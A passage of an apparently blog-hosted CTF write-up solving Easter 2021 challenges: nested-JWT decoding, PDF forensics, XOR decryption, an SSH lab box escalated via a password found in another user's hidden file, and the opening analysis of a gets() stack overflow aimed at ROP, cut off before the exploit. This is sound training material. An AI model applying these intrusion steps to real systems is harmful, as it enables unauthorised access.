class=\"hl\">JWT<\/span>s. 
Properties with a name other than <span class=\"hl\">ct1<\/span>, <span class=\"hl\">ct2<\/span>, <span class=\"hl\">ct3<\/span>, <span class=\"hl\">ct4<\/span> or <span class=\"hl\">iss<\/span> are printed:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64decode\r\nimport json\r\n\r\n\r\ndef b64url_decode(s):\r\n  return b64decode(s.replace('-', '+').replace('_','\/')+'='*((-len(s))%4))\r\n\r\ndef jwt_get_data(s):\r\n  h = s.split('.')\r\n  if (len(h) == 1):\r\n    return h[0]\r\n  return json.loads( b64url_decode(h[1]).decode() )\r\n\r\ndef jwt_get_data_rec(j):\r\n  r = ''\r\n  i = 1\r\n  key = 'ct'+str(i)\r\n  while (key in j):\r\n    j_child = jwt_get_data(j[key])\r\n    if (not isinstance(j_child, str)):\r\n      for k0 in j_child:\r\n        if (k0 not in ['ct1','ct2','ct3','ct4','iss']): print(k0+'='+j_child[k0])\r\n    r += jwt_get_data_rec(j_child)\r\n    i += 1\r\n    key = 'ct'+str(i)\r\n  return r\r\n\r\nct = open('.\/jwts.txt').read()\r\n\r\nj = jwt_get_data(ct)\r\nr = jwt_get_data_rec(j)\r\nprint(r)\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script produces the following output:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]\r\n\u2514\u2500$ .\/jwt_solv0r.py\r\niv=f_js0\r\nv=n_t0k\r\niii=nty_0\r\ni=he202\r\nii=1{pl3\r\nvi=k3nZ}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBy ordering the substrings via the roman numerals and concatenating them, we get the flag:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{pl3nty_0f_js0n_t0kk3nZ}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_26\">HE21.26 Lost<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge26.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 
(medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nOne of the flags accidentally fell into the pot with the rejected ones!\r\n\r\nCan you recover the lost flag?\r\n\r\n<span class=\"fake_link\">lost.pdf<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\n23\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is a PDF document:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/26]\r\n\u2514\u2500$ file lost.pdf\r\nlost.pdf: PDF document, version 1.3\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe document contains a lot of numbers and potential flags, printed on top of each other:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_26_01.png\" alt=\"PDF\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<span class=\"hl\">binwalk<\/span> can be used to extract the zlib-compressed content stream holding the text &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/26]\r\n\u2514\u2500$ binwalk --extract lost.pdf    \r\n\r\nDECIMAL       HEXADECIMAL     DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n0             0x0             PDF document, version: \"1.3\"\r\n141           0x8D            Zlib compressed data, default compression\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; which simply consists of 500 flags, each preceded by a number and all placed at the same y coordinate (<span class=\"hl\">767.42<\/span>), which is why they overlap in the rendered page:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/26]\r\n\u2514\u2500$ head _lost.pdf.extracted\/8D\r\n2 J\r\n0.57 w\r\nBT \/F1 12.00 Tf ET\r\nBT 232.78 795.77 Td (One of these is valid, promise) Tj ET\r\nBT 180.11 767.42 Td (001 he2021{KDJDM-UgOMM-k4j5u-ooXKJ-ighjZ}) Tj ET\r\nBT 184.10 767.42 Td (002 he2021{juE4t-VTKG7-fiYWT-EJ7Rx-h2ADI}) Tj ET\r\nBT 180.09 767.42 Td (003 he2021{dNjAc-TbPo4-keeRe-uYYmC-IngBY}) Tj ET\r\nBT 180.77 767.42 Td (004 
he2021{mXtuW-lVUVF-8mLpc-jvBHm-0kdI9}) Tj ET\r\nBT 177.43 767.42 Td (005 he2021{c4XNe-gA8wy-uJODH-BKCls-BuT5X}) Tj ET\r\nBT 185.78 767.42 Td (006 he2021{GjuXr-IjpR8-TWZjJ-zTYNb-CJnuh}) Tj ET\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWhen I initially solved the challenge I used a script which slowly picks and tries a random flag from the list. That worked.\r\n<\/p>\r\n\r\n<p>\r\nThe intended way, though, is to find flag <span class=\"hl\">23<\/span> and recognize the vertical text formed by the first character inside the braces of each following flag (thanks to <span class=\"hl\">keep3r<\/span> for this enlightenment):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\nBT 181.08 767.42 Td (020 he2021{XbBo7-PPADN-yjqIb-eEpxp-0GSa5}) Tj ET\r\nBT 175.76 767.42 Td (021 he2021{V1eud-NmSI9-spMWY-oeDe3-otDCU}) Tj ET\r\nBT 178.10 767.42 Td (022 he2021{E0FHN-am9rr-v5UhB-aYeWq-gehBJ}) Tj ET\r\nBT 179.11 767.42 Td (<span class=\"hl2\">023<\/span> he2021{<span class=\"hl2\">W<\/span>QiNE-rwbfA-mEBoq-iDFvI-NanW0}) Tj ET\r\nBT 181.43 767.42 Td (024 he2021{<span class=\"hl2\">h<\/span>XHNf-eQ3Cy-9bCSB-7jUib-bP7TL}) Tj ET\r\nBT 180.76 767.42 Td (025 he2021{<span class=\"hl2\">a<\/span>NICF-9gqXK-mB1zK-u2jkq-S1uaw}) Tj ET\r\nBT 180.75 767.42 Td (026 he2021{<span class=\"hl2\">t<\/span>HB1J-V4n4H-LKzoA-YtpVK-ERhnz}) Tj ET\r\nBT 181.43 767.42 Td (027 he2021{<span class=\"hl2\">y<\/span>PGze-ibSJ1-HkXYM-jjEh6-CY5RX}) Tj ET\r\nBT 175.44 767.42 Td (028 he2021{<span class=\"hl2\">o<\/span>RVrl-rYkMD-FeYES-V3BKZ-hHBMQ}) Tj ET\r\nBT 187.42 767.42 Td (029 he2021{<span class=\"hl2\">u<\/span>EJXe-RPpdX-tfJnr-sLmSp-IYieq}) Tj ET\r\nBT 177.77 767.42 Td (030 he2021{<span class=\"hl2\">r<\/span>xGy1-92Tky-UP8bW-DUuXu-gvmFz}) Tj ET\r\nBT 183.09 767.42 Td (031 he2021{<span class=\"hl2\">e<\/span>akn7-ASqfA-RszUP-4tkKU-PfZBL}) Tj ET\r\nBT 178.43 767.42 Td (032 he2021{<span class=\"hl2\">a<\/span>9Qat-hqeoH-bERnQ-FwDvs-KUBPl}) Tj ET\r\nBT 182.78 767.42 Td (033 he2021{<span class=\"hl2\">l<\/span>Lucw-gr9wP-z6Z0Q-iWidD-mqyqC}) Tj ET\r\nBT 179.11 767.42 Td (034 he2021{<span 
class=\"hl2\">l<\/span>V5m7-jCeSi-NQqWJ-h13dS-1WrLM}) Tj ET\r\nBT 178.11 767.42 Td (035 he2021{<span class=\"hl2\">y<\/span>WKXd-NCrSp-FTj0R-Memdi-YLcXL}) Tj ET\r\nBT 192.44 767.42 Td (036 he2021{<span class=\"hl2\">w<\/span>XDtx-qElDv-JSl93-ZarRI-fr2lA}) Tj ET\r\nBT 192.11 767.42 Td (037 he2021{<span class=\"hl2\">a<\/span>rrDr-HZs4q-f4FyZ-svkSf-18I1v}) Tj ET\r\nBT 182.77 767.42 Td (038 he2021{<span class=\"hl2\">n<\/span>ICN8-NTTjX-728LF-TSrbs-0HpLV}) Tj ET\r\nBT 174.43 767.42 Td (039 he2021{<span class=\"hl2\">t<\/span>hwgH-4CEku-7bhO3-RNx7d-MVWHe}) Tj ET\r\nBT 190.10 767.42 Td (040 he2021{<span class=\"hl2\">t<\/span>8vI9-JNZOi-xzftw-qvbJn-Fe6PV}) Tj ET\r\nBT 181.43 767.42 Td (041 he2021{<span class=\"hl2\">o<\/span>T86c-6NUbk-PN4Ot-IXxBd-9XNHf}) Tj ET\r\nBT 188.09 767.42 Td (042 he2021{<span class=\"hl2\">d<\/span>rxyt-BQQH0-ttrio-3ChkQ-9A9en}) Tj ET\r\nBT 183.77 767.42 Td (043 he2021{<span class=\"hl2\">o<\/span>DSgQ-1Erru-mZFIV-32l3B-rXiGG}) Tj ET\r\nBT 179.11 767.42 Td (044 he2021{<span class=\"hl2\">i<\/span>KGuv-wA8tD-MDKjy-uMmOq-21Opl}) Tj ET\r\nBT 185.10 767.42 Td (045 he2021{<span class=\"hl2\">s<\/span>VMtP-jos5Z-t2wHK-Yhlmf-8uHe2}) Tj ET\r\nBT 190.09 767.42 Td (046 he2021{<span class=\"hl2\">c<\/span>uek1-ynqIF-z3Pvz-zo6fi-2E0aY}) Tj ET\r\nBT 186.77 767.42 Td (047 he2021{<span class=\"hl2\">o<\/span>Af9Z-ojTaw-DnsT6-l5qfw-KfWgJ}) Tj ET\r\nBT 177.76 767.42 Td (048 he2021{<span class=\"hl2\">u<\/span>geMc-00OC1-k7aW1-jDVPS-Xi65m}) Tj ET\r\nBT 187.09 767.42 Td (049 he2021{<span class=\"hl2\">n<\/span>16l2-83aIi-BuII6-hFKKz-KWaNS}) Tj ET\r\nBT 190.42 767.42 Td (050 he2021{<span class=\"hl2\">t<\/span>yiay-YXE8h-Sxtb4-lKtZN-Gf5g3}) Tj ET\r\nBT 178.10 767.42 Td (051 he2021{<span class=\"hl2\">t<\/span>kW2k-ZXzoP-HAJeF-3NxE5-sc0WK}) Tj ET\r\nBT 183.42 767.42 Td (052 he2021{<span class=\"hl2\">o<\/span>XBCS-gIe02-eneOi-Dwubt-RXBi4}) Tj ET\r\nBT 177.08 767.42 Td (053 he2021{<span class=\"hl2\">3<\/span>KpwC-8397R-K60VJ-rVS2Q-P2p9R}) Tj ET\r\nBT 179.77 767.42 
Td (054 he2021{<span class=\"hl2\">6<\/span>KQCh-kG4Dh-REmzR-qeo8V-lkJyf}) Tj ET\r\nBT 179.75 767.42 Td (055 he2021{<span class=\"hl2\">1<\/span>YOF5-7KVIb-WjRuI-7qdGu-eNCL3}) Tj ET\r\nBT 182.10 767.42 Td (056 he2021{b7YrB-VMCRL-fE9Ba-xPIxm-r7vAy}) Tj ET\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe text states <span class=\"hl\">Whatyoureallywanttodoiscountto361<\/span>. Thus the real flag is prefixed with number <span class=\"hl\">361<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\nBT 186.43 767.42 Td (361 he2021{3t5Kc-PiP6Z-9xa2f-RNJrY-auDng}) Tj ET\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNot my favorite challenge.\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{3t5Kc-PiP6Z-9xa2f-RNJrY-auDng}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_27\">HE21.27 Ghost in a Shell 2<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge27.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\n     _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,  ,  \r\n    \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |  |  \r\n    \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |  |  \r\n     ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~  ~  \r\n   ______________________________________________________________________  \r\n    ,--.     ,--.    
\r\n   | oo |   | oo |   \r\n   | ~~ |   | ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  \r\n   |\/\\\/\\|   |\/\\\/\\|     \r\n   ______________________________________________________________________  \r\n     \r\n   \r\nConnect to the server, snoop around, and find the flag!\r\n\r\n    - <span class=\"hl\">ssh 46.101.107.117 -p 2108 -l clyde<\/span>\r\n    - password is: <span class=\"hl\">555-ClYdE<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nWe start by ssh&#8217;ing to the provided machine:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/27]\r\n\u2514\u2500$ ssh 46.101.107.117 -p 2108 -l clyde\r\nclyde@46.101.107.117's password: \r\n\r\n  _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,  ,\r\n \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |  |\r\n \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |  |\r\n  ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~  ~\r\n______________________________________________________________________\r\n ,--.     ,--.  
\r\n| oo |   | oo | \r\n| ~~ |   | ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o\r\n|\/\\\/\\|   |\/\\\/\\|   \r\n______________________________________________________________________\r\n\r\nFind the flag!\r\n\r\n60a95fed1cd6:~$\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn our home directory there is a fake flag (<span class=\"hl\">flag?.txt<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ ls -al\r\ntotal 28\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n-rwxr-xr-x    1 root     root            15 Apr 14 11:00 .bashrc\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .lost+found\r\n-rwxr-xr-x    1 root     root          3361 Mar  2 13:23 flag?.txt\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe folder <span class=\"hl\">.lost+found<\/span> seems to contain the actual flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ ls -al .lost\\+found\/\r\ntotal 16\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 ..\r\n-r--r-----    1 root     pacman          32 Apr 14 11:00 flag.txt\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough we cannot read it (only user <span class=\"hl\">root<\/span> and group <span class=\"hl\">pacman<\/span> can):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ cat .lost\\+found\/flag.txt \r\ncat: can't open '.lost+found\/flag.txt': Permission denied\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can read the home folder of <span class=\"hl\">pacman<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ ls -al \/home\/pacman\/\r\ntotal 28\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .\r\n-rwxr-xr-x    1 root     root             9 Apr 14 11:00 .\"\\?$*'N'*$?\\\"\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n-rwxr-xr-x    1 root     root           312 Mar  2 12:05 .bash_history\r\n-rwxr-xr-x    1 root     root           277 Mar  2 12:05 
notes.txt\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe file <span class=\"hl\">.&#8221;\\?$*&#8217;N&#8217;*$?\\&#8221;<\/span> seems to be interesting, but using <span class=\"hl\">cat<\/span> directly on it does not work. Though we can use <span class=\"hl\">find<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ find \/home\/pacman\/ -exec cat {} \\;\r\ncat: read error: Is a directory\r\nmsPACM4n\r\nhistory -c\r\nwhoami\r\nls -lrt\r\ncd \/home\/pacman\r\ndu -sh\r\nvi notes.txt\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe first line contains the password of <span class=\"hl\">pacman<\/span>: <span class=\"hl\">msPACM4n<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nUsing this password we can use <span class=\"hl\">su<\/span> to change to <span class=\"hl\">pacman<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n4f4ef7317075:\/home\/pacman$ su pacman\r\n4f4ef7317075:~$ id\r\nuid=1001(pacman) gid=1001(pacman) groups=1001(pacman)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can read the real <span class=\"hl\">flag.txt<\/span> in <span class=\"hl\">\/home\/clyde\/.lost+found\/<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n4f4ef7317075:\/home\/clyde\/.lost+found$ cat flag.txt \r\nhe2021{wh4ts_y0ur_grewp_4g4in?}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{wh4ts_y0ur_grewp_4g4in?}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_28\">HE21.28 Haxxor what 2?<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge28.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto, Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI was able to break the first file, but I'm stuck at this one.\r\n\r\nHelp!\r\n\r\n<span 
class=\"fake_link\">haxxorwhat2<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nThis time, the file is <b>not<\/b> an image.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe challenge is very similar to <a href=\"#he21_14\">challenge 14<\/a>, though this time the file is not supposed to be an image.\r\n<\/p>\r\n\r\n<p>\r\nI was quite lucky to guess that the file is supposed to be a zip archive. By using the same technique as in challenge 14, we can get the XOR key. For the zip archive I used the one from <a href=\"#he21_24\">challenge 24<\/a>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n&gt;&gt;&gt; ct1 = open('haxxorwhat2','rb').read()\r\n&gt;&gt;&gt; ct2 = open('..\/24\/tacocat.zip','rb').read()\r\n&gt;&gt;&gt; r = b''\r\n&gt;&gt;&gt; for i in range(16):\r\n...   r += bytes([ct1[i]^ct2[i]])\r\n... \r\n&gt;&gt;&gt; r\r\nb'xorlathnxo\\nr\\x03t\\xbdI'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis time the key is not completely recovered. Though a little bit of testing showed that the key is <span class=\"hl\">xorlatan<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nUsing the following script we can decrypt the data:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nkey = b'xorlatan'\r\n\r\nct = open('haxxorwhat2', 'rb').read()\r\n\r\nr = b''\r\nfor i in range(len(ct)):\r\n  r += bytes([ct[i]^key[i%len(key)]])\r\n\r\nf = open('out','wb')\r\nf.write(r)\r\nf.close()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script produces a valid zip archive:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ .\/crax0r.py\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ file out\r\nout: Zip archive data, at least v2.0 to extract\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe archive contains the file <span class=\"hl\">egg.png<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ zipinfo out      \r\nArchive:  out\r\nZip file size: 19143 bytes, number of 
entries: 1\r\n-rw-r--r--  3.0 unx    20506 bx defN 20-Jun-17 13:00 egg.png\r\n1 file, 20506 bytes uncompressed, 18979 bytes compressed:  7.4%\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ unzip out        \r\nArchive:  out\r\n  inflating: egg.png                 \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_28_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ zbarimg egg.png  \r\nQR-Code:he2021{ul1m4te_x0r_m4st3r}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{ul1m4te_x0r_m4st3r}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_29\">HE21.29 Sailor&#8217;s Knot<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge29.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>daubsi<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThere is a huge variety of sailor's knots, but the common thing is they all use rops\r\nor other types of cords.\r\n\r\n<span class=\"hl\">nc 46.101.107.117 2112<\/span>\r\n\r\nGet a shell and read the flag.\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<span class=\"fake_link\">sailorsknot<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nUbuntu 18.04 64 Bit\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe setting for the challenge is pretty much the same as in <a href=\"#he21_16\">challenge 16<\/a>: a 64-bit ELF binary, dynamically linked, not stripped, without stack canaries, with NX enabled, no PIC and partial 
relro:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ file sailorsknot \r\nsailorsknot: <span class=\"hl2\">ELF 64-bit<\/span> LSB executable, x86-64, version 1 (SYSV), <span class=\"hl2\">dynamically linked<\/span>, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=97703c7c27443a213e91b074911c7c744fc34043, <span class=\"hl2\">not stripped<\/span>\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ r2 -A sailorsknot \r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n[x] Analyze function calls (aac)\r\n[x] Analyze len bytes of instructions for references (aar)\r\n[x] Check for objc references\r\n[x] Check for vtables\r\n[x] Type matching analysis for all functions (aaft)\r\n[x] Propagate noreturn information\r\n[x] Use -AA or aaaa to perform additional experimental analysis.\r\n[0x00400670]&gt; iI\r\narch     x86\r\nbaddr    0x400000\r\nbinsz    7148\r\nbintype  elf\r\nbits     64\r\n<span class=\"hl2\">canary   false<\/span>\r\nclass    ELF64\r\ncompiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\r\ncrypto   false\r\nendian   little\r\nhavecode true\r\nintrp    \/lib64\/ld-linux-x86-64.so.2\r\nladdr    0x0\r\nlang     c\r\nlinenum  true\r\nlsyms    true\r\nmachine  AMD x86-64 architecture\r\nmaxopsz  16\r\nminopsz  1\r\n<span class=\"hl2\">nx       true<\/span>\r\nos       linux\r\npcalign  0\r\n<span class=\"hl2\">pic      false<\/span>\r\nrelocs   true\r\n<span class=\"hl2\">relro    partial<\/span>\r\nrpath    NONE\r\nsanitiz  false\r\nstatic   false\r\nstripped false\r\nsubsys   linux\r\nva       true\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAlso the vulnerability is the same: a stack overflow due to the usage of the unsafe <span class=\"hl\">gets<\/span> function:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; pdf @ main\r\n            ; DATA XREF from entry0 @ 0x40068d\r\n\u250c 100: int main (int argc, char **argv);\r\n\u2502           
; var char **var_30h @ rbp-0x30\r\n\u2502           ; var int64_t var_24h @ rbp-0x24\r\n\u2502           ; var char *s @ rbp-0x20\r\n\u2502           ; arg int argc @ rdi\r\n\u2502           ; arg char **argv @ rsi\r\n\u2502           0x00400757      55             push rbp\r\n\u2502           0x00400758      4889e5         mov rbp, rsp\r\n\u2502           0x0040075b      4883ec30       sub rsp, 0x30\r\n\u2502           0x0040075f      897ddc         mov dword [var_24h], edi    ; argc\r\n\u2502           0x00400762      488975d0       mov qword [var_30h], rsi    ; argv\r\n\u2502           0x00400766      b800000000     mov eax, 0\r\n\u2502           0x0040076b      e864000000     call sym.ignore_me_init_buffering\r\n\u2502           0x00400770      b800000000     mov eax, 0\r\n\u2502           0x00400775      e8ea000000     call sym.ignore_me_init_signal\r\n\u2502           0x0040077a      488d3d970100.  lea rdi, qword str.Welcome__Please_give_me_your_name ; 0x400918 ; \"Welcome! Please give me your name!\\n&gt; \" ; const char *format\r\n\u2502           0x00400781      b800000000     mov eax, 0\r\n\u2502           0x00400786      e895feffff     call sym.imp.printf         ; int printf(const char *format)\r\n\u2502           0x0040078b      488d45e0       lea rax, qword [s]\r\n\u2502           0x0040078f      4889c7         mov rdi, rax                ; char *s\r\n\u2502           0x00400792      b800000000     mov eax, 0\r\n\u2502           0x00400797      e8b4feffff     <span class=\"hl2\">call sym.imp.gets<\/span>           ; char *gets(char *s)\r\n\u2502           0x0040079c      488d45e0       lea rax, qword [s]\r\n\u2502           0x004007a0      4889c6         mov rsi, rax\r\n\u2502           0x004007a3      488d3d940100.  
lea rdi, qword str.Hi__s__nice_to_meet_you ; 0x40093e ; \"Hi %s, nice to meet you!\\n\" ; const char *format\r\n\u2502           0x004007aa      b800000000     mov eax, 0\r\n\u2502           0x004007af      e86cfeffff     call sym.imp.printf         ; int printf(const char *format)\r\n\u2502           0x004007b4      b800000000     mov eax, 0\r\n\u2502           0x004007b9      c9             leave\r\n\u2514           0x004007ba      c3             ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWhat is different though is that there is no <span class=\"hl\">profit<\/span> function, which directly spawns a shell. Nevertheless the function <span class=\"hl\">system<\/span> is present:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; afl\r\n0x00400670    1 42           entry0\r\n0x004006b0    4 42   -&gt; 37   sym.deregister_tm_clones\r\n0x004006e0    4 58   -&gt; 55   sym.register_tm_clones\r\n0x00400720    3 34   -&gt; 29   entry.fini0\r\n0x00400750    1 7            entry.init0\r\n0x00400900    1 2            sym.__libc_csu_fini\r\n0x004007d4    1 97           sym.ignore_me_init_buffering\r\n0x00400660    1 6            sym.imp.setvbuf\r\n0x00400904    1 9            sym._fini\r\n0x00400835    3 47           sym.kill_on_timeout\r\n0x00400620    1 6            sym.imp.printf\r\n0x00400600    1 6            sym.imp._exit\r\n0x00400890    4 101          sym.__libc_csu_init\r\n0x004006a0    1 2            sym._dl_relocate_static_pie\r\n0x00400757    1 100          main\r\n0x00400864    1 34           sym.ignore_me_init_signal\r\n0x00400640    1 6            sym.imp.signal\r\n0x00400630    1 6            sym.imp.alarm\r\n0x00400650    1 6            sym.imp.gets\r\n0x004007bb    1 6            sym.remove_me_before_deploy\r\n0x004005d8    3 23           sym._init\r\n<span class=\"hl2\">0x00400610    1 6            